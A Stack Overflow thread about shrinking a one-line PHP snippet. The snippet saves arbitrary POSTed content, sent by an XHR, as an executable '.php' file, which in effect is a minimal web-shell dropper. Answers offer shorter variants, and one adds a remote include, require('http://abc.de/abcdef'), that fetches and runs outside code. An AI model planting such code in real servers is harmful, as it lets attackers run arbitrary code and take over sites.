# Compressing small piece of PHP code

Tags: php, compression

I'm trying to reduce the following PHP code which creates a PHP file with data received from a [XHR](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest) call and stops the oncoming code from continue 
running.

**PHP:**

```
if(isset($_POST[0])){file_put_contents('.php',$_POST[0]);die;}
```

or (`@` because of the notice)

```
@$_=$_POST[0];if(isset($_)){file_put_contents('.php',$_);die;}
```

**JavaScript:**

```
var xhr = new XMLHttpRequest();
xhr.open('POST', location);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send('0=' + encodeURIComponent(`<?php unlink(__file__);?>`));
```

I have attempted to: change the if check to `if($_POST[0])`, a [Ternary Operator](http://php.net/manual/en/language.operators.comparison.php#language.operators.comparison.ternary), a [Null coalescing operator](http://php.net/manual/en/migration70.new-features.php#migration70.new-features.null-coalesce-op) and/or a [`try{}catch(Exception $e){}`](http://php.net/manual/en/language.exceptions.php), remove the if parentheses and/or curly braces, search for an alternative way to create a file, remove semicolons, try to work with `$_POST[]` and/or `$_POST['']`, etc.

I already changed [`exit`](http://php.net/manual/en/function.exit.php) to [`die`](http://php.net/manual/en/function.die.php), the file name to emtpy, removed spaces and line breaks, made the `$_POST` key a number and made the 2º alternative where I set a small variable as the data.

The JavaScript part doesn't need to be reduced, it can even be bigger if it reduces the PHP code.

**Note:**
Yes I know what this does and looks like.
No I'm not going to use for any of that, it's coding just for coding, because I code my own test projects to try to learn more and that.

Also if somehow this gets targeted as not a question to this site then I wrote this for nothing I guess...

Comment: https://codegolf.stackexchange.com/

Comment: What is the question here?

Comment: It's interessant that you make your own tests to learn, however it's always good to keep a rational goal in sight while doing this. Usually PHP doesn't really need to be compressed, it stays on the server and is performant enough, most of the time we will value readability more than saving octets. Javascript on the other side is often compressed, because send to the client, sometimes for obfuscation too.. you seem to do the other way round than rationality suggests

Comment: This looks like a piece of code for an easter egg to be put inside a deep nested structure. You can always strip line breaks from post via js imho.

Comment: @iainn I do know that site but I thought that it was more related with challenges where the answers try to be the smallest possible.

Comment: @Edwin The answer I want is someone to explain me how I can reduce the PhP code (if possible).

Comment: @Cemal Not sure what you mean exactly. I'm not striping line breaks on either side/code. I can change the JavaScript `\`\`` (template literal) string to anything, including line breaks and the PhP file created will have the line breaks.

Comment: as @Kaddath said, the php code remains on the server so you don't need to reduce it. For deployment purposes or so you can use http://www.ioncube.com/ for your code.

Comment: *To compress* the php code, you can remove linebreaks from php code by vanillajs. Php parser doesn't need those linebreaks.

Comment: @Cemal If you mean removing line breaks from all the PhP code then I already know that, as it's how the piece of code is (1 line). If you mean the 1 line code then idk what you mean. What's important is the 1 line code, that's why I didn't posted any other code.

Comment: In both code sections, you need to put exit out of file_get_contents parantheses. `file_put_contents('FILENAME.php',$_);exit;`

Comment: @Cemal Oh I see. That was a mistake copying the code from one computer to the other where I wrote the question.

Answer (score 0, accepted):

Using `fputs(fopen('.php','x'),$_POST[0]);` instead of `file_put_contents('.php',$_POST[0]);` saves a character but it doesn't overwrite.

> If the file already exists, the fopen() call will fail by returning FALSE and generating an error of level E_WARNING.

[php.net - fopen - description of mode 'x'](http://php.net/manual/en/function.fopen.php#refsect1-function.fopen-parameters)

So the only way to really reduce the code (by 2 characters) is to use the [logical operator](http://php.net/manual/en/language.operators.logical.php) `&&` (named And but [different than `and`](http://php.net/manual/en/language.operators.precedence.php)) in the following way:

```
isset($_POST[0])&&file_put_contents('.php',$_POST[0])&&die;
```

If the left side of `&&` is true it does the right side.

So if `isset($_POST[0])` is false it goes to the next line of code, if it's true it does the rest.

If instead it was `isset($_POST[0])&&file_put_contents('.php',$_POST[0])||die;` with `||`, it wouldn't run `die` if `file_put_contents('.php',$_POST[0])` was true because it would only need one of the two to be true.

Answer (score 0):

Presumably you are attempting to bypass a length check on the target. Minifying PHP doesn't have any performance/storage benefit.

Either you are seeking to legitimately test a defence measure or to subvert a system you shouldn't be accessing. The former is a bit silly. The latter is decidedly off-topic. However....

off the top of my head....

```
$x=$POST[0];($x&&file_put_contents('.php',$x));exit;
```

OTOH if you are trying to exploit XSLT then this only handles a single instruction, hence...

```
$_POST[0]&&file_put_content('.php',$_POST[0])||die()
```

But if your target is that badly configured then....

```
require('http://abc.de/abcdef')
```

(where the URL is from a shortening service - SO gets stroppy when you try to enter a more realistic value)

Comment: For the first one: `$POST` should be `$_POST`; needs `@` to supress the notice message; checking `$x` will result in false if the data/message is the string 0 so it needs to check with `isset()`; the `exit` should be `die` (-1 character) and it should also be inside the parentheses, else it always runs regardless of the result of the condition.

Comment: For the second one: needs `@` and `isset()`; `file_put_contents`, not `file_put_content`; needs parentheses to group the file and die code and it needs to be `&&` instead of `||`, else it wouldn't run the `die()` because the first was true.

Comment: 1) suppressing notices was not stated as a requirement 2) what has that got to with the objective you didn't tell us about 3) no, exit ends execution (there are complications around registered shutdown functions) 4) it depends on whether you want the remaining code to run if the file_put_contents fails.